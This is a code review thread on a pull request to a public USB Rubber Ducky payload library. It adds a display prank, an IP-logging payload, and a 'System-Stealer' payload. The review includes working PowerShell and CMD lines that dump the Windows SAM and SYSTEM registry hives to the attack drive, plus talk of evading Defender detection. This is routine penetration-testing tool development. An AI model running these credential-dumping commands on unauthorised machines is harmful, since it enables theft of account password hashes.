Create Resolution_Prank.txt
hak5/usbrubberducky-payloads pull request #481
Opened 2024-09-18 14:31 UTC by mavisinator30001

Added Resolution_Prank folder and related payload into said folder

2024-09-20 18:26 UTC, hak5peaks requested changes

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +STRING Powershell
I see you are using `STRING` and `ENTER`, you can use `STRINGLN` to achieve the same functionally and clean up your code. For example 

```
STRINGLN powershell
```
will inject the same as having 
```
STRING powershell
ENTER
```
Please go through and make this change where it applies.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
I would approach this differently as not everyone's ducky will be Identifies as `D:` I would use the drive label name in your powershell to find the ducks drive location. 

Just as an example, 

```
DEFINE #DRIVELABEL DUCKY

STRINGLN Get-Volume | Where-Object { $_.FileSystemLabel -eq '#DRIVELABEL' } | Select-Object -ExpandProperty DriveLetter
```
This powershell script uses drive label name to locate the drive letter. I would also recommend adding the ` DEFINE #DRIVELABEL DUCKY` as I have it in my example, so users who aren't using the default drive label of `DUCKY` can easily configure the payload.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +WAIT_FOR_BUTTON_PRESS
By default when a payload finishes running the ducky will stop execution. Default button behavior, when pressed, is to identify as `ATTACKMODE STORAGE` so if the intention is just to restore the ducky back to storage, then this isn't need.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +DELAY 500
If your main target is Windows consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/prank/Resolution_Prank/payload.txt
> +DELAY 500
Similar to your other payload, If your main target is Windows consider using `EXTENSION PASSIVE_WINDOWS_DETECT` the extension allows for the USB rubber ducky to dynamically detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/prank/Resolution_Prank/payload.txt
> +STRING display
Similar to your other payload. I see you are using `STRING` and `ENTER`, you can use `STRINGLN` to achieve the same functionally and clean up your code. 

Please go through and make this change where it applies.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
I would suggest adding a `readme.md` into this directory, including the information you have in your `REM`. Including a readme will also allow you to explain the payload more in depth and explain any configurable options.

2024-09-20 18:26 UTC, hak5peaks commented on payloads/library/prank/Resolution_Prank/payload.txt
> +REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back
I would suggest adding a `readme.md` into this directory, including the information you have in your `REM`. Including a readme will also allow you to explain the payload more in depth and explain any configurable options.

2024-09-20 18:40 UTC, mavisinator30001 commented on payloads/library/credentials/IP-Out/payload.txt
> +WAIT_FOR_BUTTON_PRESS
With the `ATTACKMODE OFF` line, the intent is to ensure that it is as indetectable as possible. Should that not actually do that and it is still just as detectable as being in HID mode I will change that. Thank you.

2024-09-20 23:19 UTC, mavisinator30001 commented on payloads/library/credentials/IP-Out/payload.txt
> +STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
That is a good point, I will fix this as soon as I can. I am the only hacking enthusiast that I know, so I did not even think that someone might want to change the default drive name. Thank you for your input, I find it invaluable!

2024-09-22 00:25 UTC, mavisinator30001 commented on payloads/library/credentials/IP-Out/payload.txt
> +STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
I am working on incorporating this into my payload. I just have to learn some powershell first as I have only ever used it for the `ipconfig` command.

2024-09-28 03:44 UTC, hak5peaks requested changes

2024-09-28 03:44 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
> +DEFINE #DRIVELABEL D
Thank you for making the requested changes, modifying your PowerShell to use drive label is a better approach instead of using the drive letter, as not everyone's Ducky will identify as their D drive and there is no way to know what it will identify as before running, I highly suggest using the drive label name instead to locate drive location. 

Ive modified your PowerShell to do this, 

```
DEFINE #DRIVELABEL DUCKY

STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
```

2024-09-28 14:54 UTC, mavisinator30001 commented on payloads/library/credentials/IP-Out/payload.txt
> +DEFINE #DRIVELABEL D
Thank you, I couldn't figure out how to come up with a powershell command for that on my own. I tried for 7 hours or so, so I really appreciate it.

2024-10-15 18:13 UTC, mavisinator30001 reviewed
Sorry it has taken me so long, I have been very busy with work and school. I do not have time to debug the updated IP-Out payload at the moment. However, I did make the change you requested.

2024-10-15 21:18 UTC, hak5peaks commented
All good! I will review it soon! Thank you for making the changes!

2024-10-19 19:40 UTC, hak5peaks requested changes

2024-10-19 19:40 UTC, hak5peaks commented on payloads/library/credentials/IP-Out/payload.txt
I think exfiltration is more fitting for this payload since its exfiltrating IP information and no credentials. 

Please move it into exfiltration directory.

2024-10-19 19:40 UTC, hak5peaks commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
I would move the `DEFINE` to the top of your payload so its easier to see and change.  

I would also use a different approach to this as not everyone's ducky will be their `D:` driver letter. Instead use the drive label name to locate drive letter, you can do this by adding a PowerShell line that uses the drive label name to locate the ducky's drive letter. 

just as a example: 

```
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
```

This will export the drive letter `$DriveLetter` as a variable you can then call in your other lines, 

```
DEFINE #DRIVELABEL DUCKY

STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
STRINGLN reg save "HKLM\sam" "$DriveLetter\sam.save"
STRINGLN reg save "HKLM\system" "$DriveLetter\system.save"
```

This is a example,

2024-10-19 19:40 UTC, hak5peaks commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    INJECT_MOD GUI R
Why do you have `INJECT_MOD` here?

2024-10-21 15:52 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    INJECT_MOD GUI R
That is left over from me experimenting with the timing and execution. To make the payload smaller, I can remove it.

2024-10-21 15:53 UTC, mavisinator30001 commented on payloads/library/credentials/IP-Out/payload.txt
I felt that it was a little off there as well, I will move it.

2024-10-21 21:47 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
I've tried that solution but I only get the output `'$DriveLetter' is not recognized as an internal or external command,
operable program or batch file.`

2024-10-21 21:47 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
This is all in an elevated cmd.exe

2024-10-21 23:26 UTC, hak5peaks commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
My apologizes, I wrote that using powershell, for CMD you can do something like this, 

```
DEFINE #DRIVELABEL DUCKY

STRINGLN for /f "skip=1 tokens=1" %A in ('wmic logicaldisk where "VolumeName='#DRIVELABEL DUCKY'" get DeviceID ^| findstr /r /v "^$"') do set DriveLabel=%A
STRINGLN reg save "HKLM\sam" "%DriveLabel%\sam.save"
STRINGLN reg save "HKLM\system" "%DriveLabel%\system.save"
```

2024-10-22 15:25 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
Now I get a return of `'wmic' is not recognized as an internal or external command,
operable program or batch file.`  Would it be more feasible to have a variable that can be changed before the payload is compiled? One that the user could change to the letter of their drive until we find a way to autodetect the it?

2024-10-22 15:27 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
If it changes anything I am using CMD from the filepath C:\WINDOWS\system32\cmd.exe as an admin.

2024-10-22 15:32 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
Though, I don't see why that would make any difference.

2024-10-22 15:36 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
I'm doing some research and I am finding that it might be an issue with my PATH.

2024-10-22 15:39 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
Alright so after a bit of searching around, I've discovered that WMIC doesn't exist in Windows 11, which is what I use, and instead I have to go to Powershell. My apologies.

2024-10-22 18:08 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
When I use the `sam.save` part of the payload, even in an elevated Powershell, it returns `Program 'reg.exe' failed to run: Access is deniedAt line:1 char:1
+ reg save HKLM\sam $DriveLetter/sam.save
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ reg save HKLM\sam $DriveLetter/sam.save
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed`

2024-10-22 18:11 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
However, when I use the actual drive label of "D:" it does not return the same and instead writes the sam.save file to my USB.

2024-10-22 18:43 UTC, mavisinator30001 commented on payloads/library/exfiltration/System-Stealer/payload.txt
> +    DEFINE #DRIVELABEL D:
Alright, I got it to do what I want, I just had to whitelist my USB because Defender kept labelling it as a Trojan when it used the `$DriveLetter` variable to get sam.save.

2024-10-24 00:18 UTC, hak5peaks requested changes

2024-10-24 00:18 UTC, hak5peaks commented on payloads/library/exfiltration/IP-Out/payload.txt
> +DEFINE #DRIVELABEL D
You currently have 2 defines for drive label. Please remove the duplicated `DEFINE`. In its current state, having a duplicated define will create a compiling error.

2024-10-24 18:56 UTC, mavisinator30001 commented on payloads/library/exfiltration/IP-Out/payload.txt
> +DEFINE #DRIVELABEL D
That is my mistake, I thought I fixed that before I copy-pasted the code from Payload Studio.

2024-10-24 19:30 UTC, merged